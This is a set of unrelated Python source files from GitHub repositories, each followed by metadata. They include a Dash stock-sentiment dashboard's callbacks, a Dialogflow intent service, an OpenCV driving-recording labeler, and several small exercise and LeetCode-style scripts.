########################################################################################### ##########################################CALLBACKS######################################## ########################################################################################### @app.callback([Output('stockdescription', 'children'), Output('stockfundchart', 'figure'), Output('stockchart', 'figure') ], Input('dropdown', 'value') ) def update_graphs(value): ##### stockdescription, stock_fundament = get_stock_fundamentals(value) stock_fund_treefig = px.treemap(stock_fundament, path=['index', 'value'], color_discrete_sequence = px.colors.qualitative.Pastel,height=400) data = get_stockpricedata(value, stockprice_number_of_days) stock_fig = candlestick_chart(data) return stockdescription, stock_fund_treefig,stock_fig @app.callback( Output('tickertopmentionssunburstplot', 'figure'), Input('dropdown', 'value') ) def update_graphs(value): ##### tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1') reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata') tweet_df = tweet_df[tweet_df['ticker'] == '$'+value] reddit_df = reddit_df[reddit_df['ticker'] == value] tweet_df['DataSource'] = 'Twitter' reddit_df['DataSource'] = 'Reddit' reddit_top_mentions = top_words_on_key(reddit_df, 'text', 'Reddit', '@', 'Mentions', 5) reddit_top_hashtags = top_words_on_key(reddit_df, 'text', 'Reddit', '#', 'Hashtags', 5) twitter_top_mentions = top_words_on_key(tweet_df, 'text', 'Twitter', '@', 'Mentions', 5) twitter_top_hashtags = top_words_on_key(tweet_df, 'text', 'Twitter', '#', 'Hashtags', 5) top_social_media = pd.concat( [reddit_top_mentions, reddit_top_hashtags, twitter_top_mentions, twitter_top_hashtags]) top_mentions_hastags_sunburstfig = px.sunburst(top_social_media, path=['keytype', 'Source', 'index'], values='count',color_discrete_sequence=px.colors.qualitative.Pastel) top_mentions_hastags_sunburstfig.update_layout( plot_bgcolor='#5B5959', title=dict(text="<b>Top Mentions/Hashtags on Social Media</b>"), font=dict(size=11) ) return top_mentions_hastags_sunburstfig @app.callback( Output('stocksentimentlinechart', 'figure') , Input('dropdown', 'value') ) def update_graphs(value): ##### tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1') reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata') tweet_df = tweet_df[tweet_df['ticker'] == '$'+ value] reddit_df = reddit_df[reddit_df['ticker'] == value] tweet_df['DataSource'] = 'Twitter' reddit_df['DataSource'] = 'Reddit' twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df]) twitter_reddit_sentiment_df['datehour'] = pd.to_datetime( twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H")) twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y")) finaldf = twitter_reddit_sentiment_df.groupby(['datehour', 'DataSource'])['sentiment_score'].mean().reset_index() stock_sentiment_line_fig = update_sentiment_linechart(finaldf, x='datehour', y='sentiment_score', color='DataSource') return stock_sentiment_line_fig @app.callback([ Output('stocksentimentfunnelallchart', 'figure'), Output('stocksentimentfunnelchart', 'figure') ], Input('dropdown', 'value') ) def update_graphs(value): ##### tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1') reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata') tweet_df = tweet_df[tweet_df['ticker'] == '$'+value] reddit_df = reddit_df[reddit_df['ticker'] == value] tweet_df['DataSource'] = 'Twitter' reddit_df['DataSource'] = 'Reddit' twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df]) twitter_reddit_sentiment_df['datehour'] = pd.to_datetime( twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H")) twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y")) finaldf_date = twitter_reddit_sentiment_df.groupby(['Date', 'DataSource', 'sentiment']).size().reset_index() final__ = finaldf_date.sort_values(0, ascending=False) stock_sentiment_funnel_all_fig = px.bar(final__, x=0, y='sentiment', color="DataSource") #stock_sentiment_funnel_all_fig.update_layout(showlegend=False) finaldf_ = twitter_reddit_sentiment_df.groupby(['datehour', 'DataSource', 'sentiment']).size().reset_index() finaldf_2 = finaldf_[finaldf_['sentiment'] != "Neutral"] stock_sentiment_funnel_fig = update_stock_sentiment_funnel(finaldf_2, x="datehour", y=0, text="DataSource", color="sentiment") return stock_sentiment_funnel_all_fig,stock_sentiment_funnel_fig @app.callback([ Output('sentimenttable', 'children'), Output('redditwordcloudplot', 'figure'), Output('twitterwordcloudplot', 'figure') ], Input('dropdown', 'value') ) def update_graphs(value): tweetdf = get_data_from_db( db_table_name = 'socialmediadata.ticker_twitterdata1') redditdf = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata') tweet_df = tweetdf[tweetdf['ticker'] == '$'+value] reddit_df = redditdf[redditdf['ticker'] == value] tweet_df['DataSource'] = 'Twitter' reddit_df['DataSource'] = 'Reddit' twitter_reddit_sentiment_df = pd.concat([tweet_df, reddit_df]) nlpinsight = nlpinsights(reddit_df, column_name="text") reddit_wordcloud_fig = nlpinsight.visualize_wordclouds() nlpinsight = nlpinsights(tweet_df, column_name="text") twitter_wordcloud_fig = nlpinsight.visualize_wordclouds() twitter_reddit_sentiment_df['datehour'] = pd.to_datetime( twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y, %H")) twitter_reddit_sentiment_df['Date'] = pd.to_datetime(twitter_reddit_sentiment_df.date_hour.dt.strftime("%m/%d/%Y")) print(twitter_reddit_sentiment_df.columns) twitter_reddit_sentiment_fil = twitter_reddit_sentiment_df[['date_hour', 'text', 'sentiment_score','DataSource','url']] twitter_reddit_sentiment_fil = twitter_reddit_sentiment_fil.round(3) def f(row): l = "[{0}]({0})".format(row["url"]) return l print(twitter_reddit_sentiment_fil.head(2)) twitter_reddit_sentiment_fil["url"] = twitter_reddit_sentiment_fil.apply(f, axis=1) #twitter_reddit_sentiment_fil = twitter_reddit_sentiment_fil[ # (twitter_reddit_sentiment_fil['sentiment_score'] > int(slidervalue[0])) & ( # twitter_reddit_sentiment_fil['sentiment_score'] < int(slidervalue[1]))] sentiments_table = dash_table.DataTable( id='datatable-output1', style_data={ 'whiteSpace': 'normal', # 'height': 'auto' }, data=twitter_reddit_sentiment_fil.to_dict('records'), row_selectable="multi", selected_rows=[], columns=[{'id': c, 'name': c ,'type':'text', 'presentation':'markdown'} for c in twitter_reddit_sentiment_fil.columns], # columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}], filter_action='native', sort_action='native', css=[ {'selector': '.row-1', 'rule': 'background: #E6A000;'} ], page_size=4, style_header={'backgroundColor': '#7DF180', 'fontWeight': 'bold', 'border': '1px solid black', 'font_size': '18px'}, style_cell={'font_size': '11px', 'whiteSpace': 'normal', 'height': 'auto', 'padding': '15px'}, # export_format='csv', export_format='csv', style_cell_conditional=[ {'if': {'column_id': 'date_hour'}, 'width': '10%', 'textAlign': 'left'}, {'if': {'column_id': 'sentiment_score'}, 'width': '5%', 'textAlign': 'left'}, {'if': {'column_id': 'text'}, 'width': '65%', 'textAlign': 'left'}, {'if': {'column_id': 'DataSource'}, 'width': '10%', 'textAlign': 'left'}, {'if': {'column_id': 'url'}, 'width': '10%', 'textAlign': 'left'} ] ) #top_mentions_hastags_sunburstfig return sentiments_table,reddit_wordcloud_fig,twitter_wordcloud_fig @app.callback( Output('newsngramfig', 'figure'), Output('newswordcloudfig', 'figure'), Input('dropdown', 'value') ) def update_graphs(value): news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata') news_df = news_df[news_df['ticker'] == value] news_df = news_df.round(3) news_df = news_df.head(15) nlpinsight = nlpinsights(news_df, column_name="text") news_wordcloud_fig = nlpinsight.visualize_wordclouds() news_ngram_fig = nlpinsight.visualize_ngrams(2,5) return news_ngram_fig,news_wordcloud_fig @app.callback( Output('newsnamedentity', 'figure'), Input('dropdown', 'value') ) def update_graphs(value): news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata') news_df = news_df[news_df['ticker'] == value] news_df = news_df.round(3) news_df = news_df.head(5) nlpinsight = nlpinsights(news_df, column_name="text") news_namedentity_fig = nlpinsight.visualize_namedentities() return news_namedentity_fig @app.callback(Output('newsarticletable', 'children'), Input('dropdown', 'value') ) def update_graphs(value): news_df = get_data_from_db(db_table_name='socialmediadata.ticker_newsdata') news_df = news_df[news_df['ticker'] == value] news_df = news_df.round(3) #newsarticle_df = news_df[news_df['ticker'] == value] newsarticle_df = news_df[['date','title','summary','sentiment_score','link']] newsarticle_df = newsarticle_df[newsarticle_df['summary']!='Invalid'] #print(newsarticle_df) def f(row): l = "[{0}]({0})".format(row["link"]) return l newsarticle_df["link"] = newsarticle_df.apply(f, axis=1) newsarticle_table = dash_table.DataTable( id='datatable-output1', style_data={ 'whiteSpace': 'normal', # 'height': 'auto' }, data=newsarticle_df.to_dict('records'), row_selectable="multi", selected_rows=[], columns=[{'id': c, 'name': c ,'type':'text', 'presentation':'markdown'} for c in newsarticle_df.columns], # columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}], filter_action='native', sort_action='native', css=[ {'selector': '.row-1', 'rule': 'background: #E6A000;'} ], page_size=4, style_header={'backgroundColor': '#7DF180', 'fontWeight': 'bold', 'border': '1px solid black', 'font_size': '18px'}, style_cell={'font_size': '11px', 'whiteSpace': 'normal', 'height': 'auto', 'padding': '15px'}, # export_format='csv', export_format='csv', style_cell_conditional=[ {'if': {'column_id': 'Date'}, 'width': '15%', 'textAlign': 'left'}, {'if': {'column_id': 'Title'}, 'width': '20%', 'textAlign': 'left'}, {'if': {'column_id': 'Link'}, 'width': '10%', 'textAlign': 'left'}, {'if': {'column_id': 'summary'}, 'width': '45%', 'textAlign': 'left'}, {'if': {'column_id': 'sentiment_score'}, 'width': '10%', 'textAlign': 'left'}, {'if': {'column_id': 'sentiment'}, 'width': '5%', 'textAlign': 'left'} ] ) return newsarticle_table @app.callback(Output('tweettable', 'children'), [Input('twitter_search', 'value'), Input('interval-component', 'n_intervals')] ) def update_graphs(value,n): mainlis = [] res = api.search(value) for i in res: lis = [] lis.append([i.id, i.created_at, i.text]) mainlis.append(lis) tweetstream_df = pd.DataFrame(mainlis) tweetstream_table = dash_table.DataTable( id='datatable-output', style_data={ 'whiteSpace': 'normal', 'height': 'auto', 'lineHeight': '15px' }, data=tweetstream_df.to_dict('records'), css=[ {'selector': '.row-1', 'rule': 'background: #E6A000;'} ], columns=[{'id': c, 'name': c} for c in tweetstream_df.columns], page_size=8, style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black', 'font_size': '18px'}, style_cell={'font_size': '11px', 'font_family': "Arial", 'whiteSpace': 'normal', 'height': 'auto', 'padding': '15px' }, # export_format='csv', export_format='csv', export_headers='display', style_data_conditional=[ { 'if': {'row_index': 'odd'}, 'backgroundColor': 'rgb(248, 248, 248)' } ], style_cell_conditional=[ {'if': {'column_id': 'UserTweetDate'}, 'width': '10%', 'textAlign': 'center'}, {'if': {'column_id': 'Time'}, 'width': '10%', 'textAlign': 'center'}, {'if': {'column_id': 'Tweet'}, 'width': '55%', 'textAlign': 'left'}, {'if': {'column_id': 'sentiment'}, 'width': '15%', 'textAlign': 'left'}, ] ) return tweetstream_table @app.callback(Output('semanticsearchtable', 'children') , Input('semantic_search', 'value') ) def update_graphs(value): stock_socialmediasemanticdata = get_data_from_db(db_table_name='socialmediadata.stock_socialmediasemanticdata') semantic_df = get_similar_sentences(stock_socialmediasemanticdata,[value]) def f(row): l = "[{0}]({0})".format(row["link"]) return l semantic_df["link"] = semantic_df.apply(f, axis=1) print("Semantic Searchhh") print(semantic_df.head()) tweetstream_table = dash_table.DataTable( id='datatable-output1', style_data={ 'whiteSpace': 'normal', # 'height': 'auto' }, data=semantic_df.to_dict('records'), columns=[{'id': c, 'name': c, 'type': 'text', 'presentation': 'markdown'} for c in semantic_df.columns], # columns=[{'name': 'Link', 'id': 'Link', 'type': 'text', 'presentation': 'markdown'}], #filter_action='native', sort_action='native', css=[ {'selector': '.row-1', 'rule': 'background: #E6A000;'} ], page_size=4, style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black', 'font_size': '18px'}, style_cell={'font_size': '11px', 'whiteSpace': 'normal', 'height': 'auto', 'padding': '15px'}, # export_format='csv', export_format='csv' ) return tweetstream_table @app.callback(Output('stocktwits-output', 'children'), [Input('dropdown', 'value')]) def get_data_table2(option): df2 = getstocktwitsdata(option) #print('---STOCKTWITS---') #print(df2) df = df2[['date','time','text','sentiment']] df.columns = ['UserTweetDate', 'Time', 'Tweet', 'sentiment'] filtereddf = df.copy() filteredtable = dash_table.DataTable( id='datatable-output', style_data={ 'whiteSpace': 'normal', 'height': 'auto', 'lineHeight': '15px' }, data=filtereddf.to_dict('records'), css=[ { 'selector': '.row-1', 'rule': 'background: #E6A000;' } ], columns=[{'id': c, 'name': c} for c in filtereddf.columns], page_size=8, style_header={'backgroundColor': '#E6A000', 'fontWeight': 'bold', 'border': '1px solid black', 'font_size': '18px'}, style_cell={'font_size': '11px', 'font_family':"Arial",'whiteSpace': 'normal', 'height': 'auto', 'padding': '15px' }, #export_format='csv', export_format='csv', export_headers='display', style_data_conditional=[ { 'if': {'row_index': 'odd'}, 'backgroundColor': 'rgb(248, 248, 248)' } ], style_cell_conditional=[ {'if': {'column_id': 'UserTweetDate'}, 'width': '10%', 'textAlign': 'center'}, {'if': {'column_id': 'Time'}, 'width': '10%', 'textAlign': 'center'}, {'if': {'column_id': 'Tweet'}, 'width': '55%', 'textAlign': 'left'}, {'if': {'column_id': 'sentiment'}, 'width': '15%', 'textAlign': 'left'}, ] ) return filteredtable @app.callback( Output('main_div', 'children'), [Input('tabs-styled-with-inline', 'value')]) def update_graph(tab_btn): if tab_btn == "socialmedia": return SOCIALMEDIA_BODY elif tab_btn == "home": return HOME_BODY elif tab_btn == "news": return NEWS_BODY if __name__ == "__main__": app.run_server(port = 8053)
balasubramaniamniit/StockMarket-Insights
app.py
app.py
py
30,384
python
en
code
0
github-code
6
26345492918
class Technology: def __init__(self, language, course_name, participants): self.language = language self.course_name = course_name self.participants = participants self.course = {self.course_name: int(self.participants)} self.total_participants = int(participants) def add_course(self, course_name, participants): if course_name not in self.course: self.course.update({course_name: int(participants)}) else: self.course[course_name] = self.course[course_name] + \ int(participants) self.total_participants += int(participants) def __str__(self): return f"language - {self.language} / total_participants - {self.total_participants} / course - {self.course}" data = input() objects = [] while data != 'end': data = data.split(' - ') language = data[0] courses = data[1] courses = courses.split(", ") for item in courses: course_name = item.split(":")[0] participants = item.split(":")[1] if language not in [x.language for x in objects]: obj = Technology(language, course_name, participants) objects.append(obj) else: for i in objects: if i.language == language: i.add_course(course_name, participants) data = input() tech_sort = sorted(objects, key=lambda x: -x.total_participants) print(f"Most popular: {tech_sort[0].language} ({tech_sort[0].total_participants} participants)") print(f"Least popular: {tech_sort[-1].language} ({tech_sort[-1].total_participants} participants)") for index, elem in enumerate(tech_sort): print(f"{tech_sort[index].language} \ ({tech_sort[index].total_participants} participants):") course_sort = sorted(elem.course.items(), key=lambda x: -x[1]) for item in course_sort: print(f"--{item[0]} -> {item[1]}")
YovchoGandjurov/Python-Fundamentals
Exam Preparation/04.Course_Stats.py
04.Course_Stats.py
py
1,962
python
en
code
1
github-code
6
39176120423
array = [1,2,3,4] array2 = [1,1,1,1,1] def runningSum(array): sum = 0 new_array = [] for i in range(0 , len(array)): sum = sum + array[i] new_array.append(sum) return new_array print(runningSum(array2))
adnantabda/Competitive-Programming
easy/running_sum_of_1D_array.py
running_sum_of_1D_array.py
py
238
python
en
code
0
github-code
6
6428337601
#! /user/bin/env python # -*- coding:utf-8 -*- from python_http_runner.src.common.utils import get_data_from_yml from python_http_runner.src.common.utils import get_url def common_get(*args): data = { "env": "TEST", "key1": "value1", "key2": "value2", "url": "" } file = "../common/config.yml" content = get_data_from_yml(file) data["env"] = content["env"] data["key1"] = content["key1"] data["key2"] = content["key2"] data["url"] = get_url() value = "" if str(args[0]) in data.keys(): value = data.get(str(args[0])) return value def feature1_get(*args): data = { "key1": "key1", "key2": "key2", } value = "" if str(args[0]) in data.keys(): value = data.get(str(args[0])) return value def feature2_get(*args): data = { "key1": "key1", "key2": "key2", } value = "" if str(args[0]) in data.keys(): value = data.get(str(args[0])) return value
liuxu263/PythonHttpRunner
python_http_runner/src/testsuites/debugtalk.py
debugtalk.py
py
1,019
python
en
code
0
github-code
6
16731268894
from abc import ABC, ABCMeta, abstractmethod from datetime import datetime from pprint import pprint from typing import Dict try: from dialogflow_v2 import SessionsClient from dialogflow_v2.proto.session_pb2 import ( DetectIntentResponse, QueryInput, QueryResult, TextInput, ) except: SessionsClient = None DetectIntentResponse = None QueryInput = None QueryResult = None TextInput = None from haps import SINGLETON_SCOPE, base, egg, scope from haps.config import Config from botkit.builtin_services.nlu.dialogflowconfig import DialogflowConfig from botkit.builtin_services.nlu.messageunderstanding import MessageUnderstanding @scope(SINGLETON_SCOPE) @base class INLUService(ABC): @abstractmethod def detect_intents(self, chat_id: int, message: str, language_code: str = None): pass @egg class DialogflowService(INLUService): config: DialogflowConfig = Config(DialogflowConfig.KEY) def __init__(self): self.session_client = SessionsClient.from_service_account_file( self.config.json_credentials_file ) def detect_intents( self, chat_id: int, message: str, language_code: str = "en" ) -> MessageUnderstanding: session = self.session_client.session_file(self.config.project_id, chat_id) text_input = TextInput(text=message, language_code=language_code) query_input = QueryInput(text=text_input) response: DetectIntentResponse = self.session_client.detect_intent( session=session, query_input=query_input ) result: QueryResult = response.query_result # Ignored result fields: # - all_required_params_present # - fulfillment_text # - fulfillment_messages # - webhook_source # - webhook_payload # - output_contexts # - diagnostic_info return MessageUnderstanding( text=result.query_text, language_code=result.language_code, action=result.action, intent=result.intent.display_name, parameters=self._normalize_parameters(result.parameters), contexts=result.output_contexts, confidence=result.speech_recognition_confidence or result.intent_detection_confidence, date=datetime.now(), ) def _normalize_parameters(self, params: Dict): result = {} for k, v in params.items(): if "date" in k and v: if hasattr(v, "keys") and "date_time" in v: accessor = v["date_time"] else: accessor = v print(accessor) time_and_date: datetime = dateutil.parser.parse(accessor) result[k] = time_and_date continue result[k] = v return result if __name__ == "__main__": conf = DialogflowConfig( project_id="userbot-9994a", json_credentials_file="C:/projects/userbot/dialogflow-credentials.json", ) c = DialogflowService(conf) nlu = c.detect_intents(123, "!remind @tWiTfAcE to buy milk tomorrow at 6", "en") # print(nlu) pprint(nlu)
autogram/Botkit
botkit/builtin_services/nlu/nluservice.py
nluservice.py
py
3,231
python
en
code
10
github-code
6
30544609936
# stemming # e.g. stemming will convert ["python","pythoner","pythoning","pythoned","pythonly"] to python # e.g. stemming will convert ["interesting","interested"] to interest # stemming may create some words that do not exits from nltk.stem import PorterStemmer from nltk.tokenize import word_tokenize ps = PorterStemmer() example_words = ["python","pythoner","pythoning","pythoned","pythonly"] for w in example_words: print(ps.stem(w)) new_text = ("It is very import to be pythonly while you are pythoning with python. " "All pythoners have have pythoned poorly at least once.") words = word_tokenize(new_text) for w in words: print(ps.stem(w))
limingwu8/ML
NLP/demo03.py
demo03.py
py
669
python
en
code
1
github-code
6
71885865788
#! /usr/bin/env python import sys from collections import defaultdict from intcode import IntCode lines = [] for line in sys.stdin: lines.append(line.rstrip('\n')) class Robot(): program=None direction=(0,1) position=(0,0) panels=None def __init__(self, line) -> None: self.program = IntCode(line.split(','), inputs=[]) self.panels = defaultdict(int) def move(self, val): dx,dy=self.direction if val==1: self.direction=dy,-dx else: # val==0: self.direction=-dy,dx self.position = tuple(self.position[i]+self.direction[i] for i in (0,1,)) def run(self): while not self.program.finished: self.program.inputs.append(self.panels[self.position]) self.program.run() if not self.program.finished: color, new_dir = self.program.outputs self.program.outputs.clear() self.panels[self.position] = color self.move(new_dir) # Part 1 print("-- Part 1 --") robot = Robot(lines[0]) robot.run() dim = len(robot.panels.keys()) print(dim) # Part 2 print("-- Part 2 --") robot = Robot(lines[0]) robot.panels[0,0] = 1 # we start on a white panel instead robot.run() min_x, min_y, max_x, max_y = dim,dim,-dim,-dim for (x,y) in robot.panels.keys(): min_x = min(x,min_x) max_x = max(x,max_x) min_y = min(y,min_y) max_y = max(y,max_y) for y in reversed(range(min_y, max_y+1)): print(''.join( '@' if robot.panels[x,y]==1 else ' ' for x in range(min_x, max_x+1)))
albatros69/aoc-2019
day-11/paint.py
paint.py
py
1,580
python
en
code
0
github-code
6
19167010026
#!/usr/bin/env python3 """OpenCV-based frame viewer that replays recordings and assign time-based labels""" import argparse from pathlib import Path import time import cv2 import numpy as np import derp.util class Labeler: """OpenCV-based frame viewer that replays recordings and assign time-based labels""" def __init__(self, folder, scale=1, bhh=40): """Load the topics and existing labels from the folder, scaling up the frame""" self.folder = folder self.scale = scale self.bhh = bhh self.config_changed = False self.quality = None self.config_path = self.folder / "config.yaml" self.window_name = "Labeler %s" % self.folder self.config = derp.util.load_config(self.config_path) self.quality_colors = [(0, 0, 255), (0, 128, 255), (0, 255, 0)] self.topics = derp.util.load_topics(folder) self.frame_id = 0 self.n_frames = len(self.topics["camera"]) self.seek(self.frame_id) self.f_h = self.frame.shape[0] self.f_w = self.frame.shape[1] self.l_h = int(self.bhh // 5) self.window = np.zeros( [self.f_h + self.bhh * 2 + self.l_h + 2, self.f_w, 3], dtype=np.uint8 ) self.paused = True self.show = False # Prepare labels self.autonomous_bar = np.ones((self.f_w, 3), dtype=np.uint8) * (255, 255, 255) self.quality_bar = np.ones((self.f_w, 3), dtype=np.uint8) * (128, 128, 128) if "quality" in self.topics and len(self.topics["quality"]) >= self.n_frames: self.qualities = [str(msg.quality) for msg in self.topics["quality"]] else: self.qualities = ["junk" for _ in range(self.n_frames)] for i, quality in enumerate(self.qualities): self.update_quality(i, i, quality) # Prepare state messages self.camera_times = [msg.publishNS for msg in self.topics["camera"]] self.camera_autos = [] auto = False for timestamp, topic, msg in derp.util.replay(self.topics): if topic == 'controller': auto = msg.isAutonomous elif topic == 'camera': self.camera_autos.append(auto) actions = derp.util.extract_car_actions(self.topics) self.camera_speeds = derp.util.extract_latest(self.camera_times, actions[:, 0], actions[:, 1]) self.camera_steers = derp.util.extract_latest(self.camera_times, actions[:, 0], actions[:, 2]) window_Xs = np.linspace(self.camera_times[0], self.camera_times[-1], self.f_w) self.window_speeds = np.array(np.interp(window_Xs, self.camera_times, self.camera_speeds) * -self.bhh, dtype=np.int) self.window_steers = np.array(np.interp(window_Xs, self.camera_times, self.camera_steers) * -self.bhh, dtype=np.int) self.autonomous_bar *= np.array(np.interp(window_Xs, self.camera_times, self.camera_autos), dtype=np.uint8)[:, None] self.window_steers[self.window_steers > self.bhh] = self.bhh self.window_steers[self.window_steers < -self.bhh] = -self.bhh cv2.namedWindow(self.window_name) cv2.setMouseCallback(self.window_name, self.click_handler) # Print some statistics duration = (self.camera_times[-1] - self.camera_times[0]) / 1e9 fps = (len(self.camera_times) - 1) / duration print("Duration of %.0f seconds at %.0f fps" % (duration, fps)) def __del__(self): """Deconstructor to close window""" cv2.destroyAllWindows() def click_handler(self, event, x, y, flags, param): """ Handle clicks on the window """ if event == cv2.EVENT_LBUTTONDOWN: if y > self.f_h: frame_id = int((x / self.f_w) * self.n_frames) self.seek(frame_id) self.show = True def update_quality(self, first_index, last_index, quality=None): """Update the label bar to the given quality""" if quality is None: return False first_index, last_index = min(first_index, last_index), max(first_index, last_index) for index in range(first_index, last_index + 1): self.qualities[index] = quality beg_pos = self.frame_pos(first_index) end_pos = self.frame_pos(last_index + (self.n_frames < len(self.quality_bar))) self.quality_bar[beg_pos : end_pos + 1] = self.bar_color(quality) return True def seek(self, frame_id=None): """Update the current frame to the given frame_id, otherwise advances by 1 frame""" if frame_id is None: frame_id = self.frame_id + 1 if frame_id < 0: frame_id = 0 self.paused = True if frame_id >= self.n_frames: frame_id = self.n_frames - 1 self.paused = True self.update_quality(self.frame_id, frame_id, self.quality) self.frame = cv2.resize( derp.util.decode_jpg(self.topics["camera"][frame_id].jpg), None, fx=self.scale, fy=self.scale, interpolation=cv2.INTER_AREA, ) self.frame_id = frame_id return True def bar_color(self, quality): """Figure out the color for the given quality""" if quality is None: return (128, 128, 128) return self.quality_colors[derp.util.TOPICS["quality"].QualityEnum.__dict__[quality]] def display(self): """Blit all the status on the screen""" self.window[: self.frame.shape[0], :, :] = self.frame horizon_percent = self.config["camera"]["pitch"] / self.config["camera"]["vfov"] + 0.5 # Horizon line self.window[int(self.f_h * horizon_percent), :, :] = (255, 0, 255) # Clear status buffer self.window[self.f_h :, :, :] = 0 # Draw label bar self.window[self.f_h : self.f_h + self.l_h // 2, :, :] = self.autonomous_bar self.window[self.f_h + self.l_h // 2 : self.f_h + self.l_h, :, :] = self.quality_bar # Draw current timestamp vertical line current_x = self.frame_pos(self.frame_id) self.window[self.f_h + self.l_h :, current_x, :] = self.bar_color(self.quality) # Draw zero line self.window[self.f_h + self.l_h + self.bhh, :, :] = (96, 96, 96) offset = self.f_h + self.bhh + self.l_h self.window[self.window_speeds + offset, np.arange(self.f_w), :] = (255, 64, 255) self.window[self.window_steers + offset, np.arange(self.f_w), :] = (64, 255, 255) text = "%05i %07.3f %06.3f %06.3f" % (self.frame_id, (self.camera_times[self.frame_id] / 1E9) % 100, self.camera_steers[self.frame_id], self.camera_speeds[self.frame_id]) font = cv2.FONT_HERSHEY_SIMPLEX pink = (255, 128, 255) offset = (0, int(self.scale * 30)) cv2.putText(self.window, text, offset, font, self.scale, pink, 1, cv2.LINE_AA) cv2.imshow(self.window_name, self.window) def save_labels(self): """Write all of our labels to the folder as messages""" with derp.util.topic_file_writer(self.folder, "quality") as quality_fd: for quality_i, quality in enumerate(self.qualities): msg = derp.util.TOPICS["quality"].new_message( createNS=derp.util.get_timestamp(), publishNS=self.topics["camera"][quality_i].publishNS - 1, writeNS=derp.util.get_timestamp(), quality=quality, ) msg.write(quality_fd) print("Saved quality labels in", self.folder) if self.config_changed: derp.util.dump_config(self.config, self.config_path) print("Saved changes to config") def handle_keyboard_input(self): """Fetch a new keyboard input if one exists""" key = cv2.waitKey(1) & 0xFF if key == 255: return True if key == 27: return False # ESC if key == ord(" "): self.paused = not self.paused elif key == ord("g"): self.quality = "good" elif key == ord("r"): self.quality = "risk" elif key == ord("t"): self.quality = "junk" elif key == ord("c"): self.quality = None elif key == ord("s"): self.save_labels() elif key == 82: self.seek(self.frame_id + 10) # up elif key == 84: self.seek(self.frame_id - 10) # down elif key == 81: self.seek(self.frame_id - 1) # left elif key == 83: self.seek(self.frame_id + 1) # right elif key == 85: self.config["camera"]["pitch"] -= 0.1 # page up self.config_changed = True elif key == 86: self.config["camera"]["pitch"] += 0.1 # page down self.config_changed = True elif ord("1") <= key <= ord("5"): self.seek(int(self.n_frames * (key - ord("0") - 1) / 4)) elif key != 255: print("Unknown key press: [%s]" % key) self.show = True return True def frame_pos(self, frame_id): """Position of current camera frame on the horizontal status bars""" return min(self.f_w - 1, int(frame_id / self.n_frames * self.f_w)) def run(self): """Run the labeling program in a forever loop until the user quits""" self.display() while True: if not self.paused: self.show = self.seek() if self.show: self.display() self.show = False if not self.handle_keyboard_input(): break time.sleep(0.01) def main(): """Initialize the labeler based on user args and run it""" print( """ This labeling tool interpolates the data based on camera frames and then lets you label each. To exit press ESCAPE To save press s To navigate between frames: Left/Right: move in 1 frame increments Up/Down: move in 10 frame increments 1: goes to beginning 2: goes to 25% in 3: goes to 50% in 4 goes to 25% in 5: goes to end To adjust horizon line press PAGE_UP or PAGE_DOWN To change the quality label of this frame g: good (use for training) r: risk (advanced situation not suitable for classic training) t: junk (don't use this part of the video, aka trash) c: clear, as in don't change the quality label """ ) parser = argparse.ArgumentParser() parser.add_argument("paths", type=Path, nargs="*", metavar="N", help="recording path location") parser.add_argument("--scale", type=float, default=1.0, help="frame rescale ratio") args = parser.parse_args() if not args.paths: recordings = (derp.util.DERP_ROOT / "recordings").glob("recording-*") args.paths = [r for r in recordings if not (r / "quality.bin").exists()] for path in args.paths: print("Labeling", path) labeler = Labeler(folder=path, scale=args.scale) labeler.run() if __name__ == "__main__": main()
notkarol/derplearning
bin/label.py
label.py
py
11,483
python
en
code
40
github-code
6
6131848495
import numpy as np from PIL import Image radar = np.load('./origin_data/radars_2020-11-01_2022-12-31.npy') color_image = Image.open('./cool_data/mask.png') mask = np.array(color_image.convert('L')) for i in range(825): for j in range(200): if mask[i, j] > 200: mask[i, j] = 0 else: mask[i, j] = 1 index = 0 ice = np.array(radar) for index in range(radar.shape[0]): for i in range(825): for j in range(200): if radar[index, i, j] > 0.53: ice[index, i, j] = 1 else: ice[index, i, j] = 0 ice[index] = ice[index]*mask print(index) np.save('./cool_data/ice_mask.npy',ice)
Ronningen/DDIN1
ice_mask_generation.py
ice_mask_generation.py
py
720
python
en
code
1
github-code
6
40071013592
class Solution: def findNthDigit(self, n): """ :type n: int :rtype: int """ if n <= 9 : return n digit = 1 count = 9 while n > digit*count: n -= digit*count digit+=1 count*=10 start = 10**(digit-1) num = n//digit + start ind = n%digit if ind == 0: r = (num-1)%10 return r else : r = (num//(10**(digit-ind)))%10 return r def main(): solution = Solution() a = 10 print ('Output:', solution.findNthDigit(a)) if __name__ == '__main__': main() # start*=10 # start+=(n-1)/digit
lucy9215/leetcode-python
400_NthDigit.py
400_NthDigit.py
py
734
python
en
code
0
github-code
6
73510522747
